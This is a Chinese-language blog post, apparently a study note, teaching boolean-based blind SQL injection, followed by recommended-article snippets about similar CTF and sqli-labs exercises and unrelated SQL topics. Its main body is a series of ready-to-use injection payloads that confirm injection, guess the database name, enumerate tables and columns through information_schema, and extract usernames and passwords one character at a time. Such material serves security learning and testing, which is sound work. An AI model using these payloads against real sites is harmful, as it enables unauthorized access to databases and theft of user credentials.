sql布尔盲注

最新推荐文章于 2024-09-06 12:25:21 发布
最新推荐文章于 2024-09-06 12:25:21 发布
阅读量38 收藏
点赞数
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abv545411/article/details/134234875
版权

接收id的值,直接带入查询,如果存在即返回 users is exists in the database,否则显示 users id is missing。
像这种只有正确与错误页面。页面不会显示数据库里任何内容,如果存在注入,称为盲注。
盲注入的方式有两种:一种是布尔型盲注入,另外一种是延时注入。

判断条件:
1.没有回显,判断使用单引号还是双引号,使他闭合

布尔型盲注入用到的函数:
SUBSTRING substring(str,i,n)字符串截取,第一个参数是字符串,第二个参数是开始截取位置,第三个是截取的长度。

盲注判断是否存在注入
1' select if(1=1,1,0)--+

2.判断数据库长度
1' and if(length(database())=4,1,0)--+

1' and if(substring(database(),1,1)='d',1,0)--+    爆库
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.@_

3.判断数据表长度
1' and if(substring((select group_concat(table_name) from information_schema.tables where table_schema =database()),1,1)="g",1,0)#       爆表

获取第一张表:
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),1,1)='g',1,0)--+

获取第二张表
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='u',1,0)--+

4.爆字段
1' and if(substring((select group_concat(column_name) from information_schema.columns where table_name = 'users'), 1, 1) = 'g', 1, 0)#

5.爆数据
1' and if(substring((select group_concat(user,password) from users), 1, 1) = 'g', 1, 0)#

xiaohaisec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用python进行sql布尔盲注exp的编写
CC210231的博客
04-04 2548
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
ctfhub-sql布尔盲注
god_001的博客
06-01 679
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
SQL布尔盲注
陈艺秋的博客
01-19 487
布尔盲注
SQL 布尔盲注
qq_42378173的博客
10-11 1303
SQL 布尔盲注
SQL布尔盲注漏洞
weixin_45007073的博客
02-19 587
原理 目前常用的SQL盲注主要有以下两类: 基于布尔盲注: 当页面没有回显位、不会输出SQL语句报错信息时,通过返回页面响应的正常或不正常的情况来进行注入。 基于时间的盲注: 当页面没有回显位、不会输出SQL语句报错信息时,不论SQL语句的执行结果对错都返回一样的页面时,通过页面的响应时间进行注入。 缺点: 两种盲注方式都需要耗费大量的精力去进行测试,因此在渗透测试过程中常使用工具(sqlmap)或脚本来代替手工操作。 以下我们将使用sqli-labs-Less8靶场进行操作和演示,注入成功则会显示"
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 2753
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL布尔盲注常用语句
孤的博客
08-23 2965
过程 1.判断是否存在注入,注入字符型还是数字型 2.猜解当前数据库数据库长度→库名 3.数据库中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.库名 1’ and length(database())>3# 1’ and length(database())=5 # 1’ and mid...
python实现sql布尔盲注
箭雨镜屋
04-25 1413
一、python代码 二、使用方法 三、测试
MySQL_SQL布尔盲注
m0_50211409的博客
04-24 582
1,判断数据库名的长度 and length(database())>9 判断数据库等于8,为8个 2,获取数据库的ascii码值 and ascii(substr(database(),1,1))>97 *由于一个一个猜太麻烦了,可以使用burp工具的lntruedr模块进行爆破, 抓包之前需要将>号改成=号才能进行爆破。 1号选择cluster bomb意思是使用交叉爆破 2号表示需要查询的数据库字符的第一位 3号表示需要进行爆破的ascii码 *设置爆破参数 切换到payloa
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
sql递归查询
yuzheh521的博客
09-02 477
是一个公用表表达式,它首先通过选择具有特定ID的部门作为起始点(锚点成员)。然后,它通过内部连接自己(递归成员)来选择所有具有这个起始部门作为父部门的子部门。但是,大多数现代的SQL数据库系统(如PostgreSQL, MySQL 8.0+, SQLite, SQL Server, Oracle)都支持它。如果你使用的数据库系统不支持。如果你确定结果中不会有重复的行(例如,每个部门ID在表中是唯一的),你也可以使用。替换为你要查询的起始部门ID的实际值,或者根据你的数据库环境使用适当的参数化查询技术。
sql 中使用like%、函数导致索引失效的解决方案
最新发布
weixin_58691039的博客
09-06 689
sql 中使用like%、函数导致索引失效的解决方案全文索引与虚拟列索引
【maxcompute|ODPS|SQL|HSQL】日期数据非标准日期格式(yyyy/M/d),如何转为yyyy-MM-dd HH:mm:ss标准格式
qq_43759478的博客
09-03 1110
补齐字符串,日期数据格式化
【BUUCTF】HardSQL
徐徐徐的博客
09-04 372
使用以下字符替代空格,可以起到相同效果或使用和。
【Postgresql】地理空间数据的存储与查询,查询效率优化策略,数据类型与查询速度的影响
走在搬砖的路上!
09-03 1253
地理空间数据的存储与查询,查询效率优化策略,数据类型与查询速度的影响,使用postgresql数据库会用到PostGIS 扩展。
PostgreSQL技术内幕6:PostgreSQL索引技术
qq_40529346的博客
09-01 2359
本文主要介绍PG的索引技术,包含PG支持的索引类型,语法,查看方式,以及其中B-Tree索引的原理解析和源码解读。
Python一些可能用的到的函数系列132 ORM-sqlalchemy连clickhouse
yukai08008的博客
09-06 756
继续ORM的转换。
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值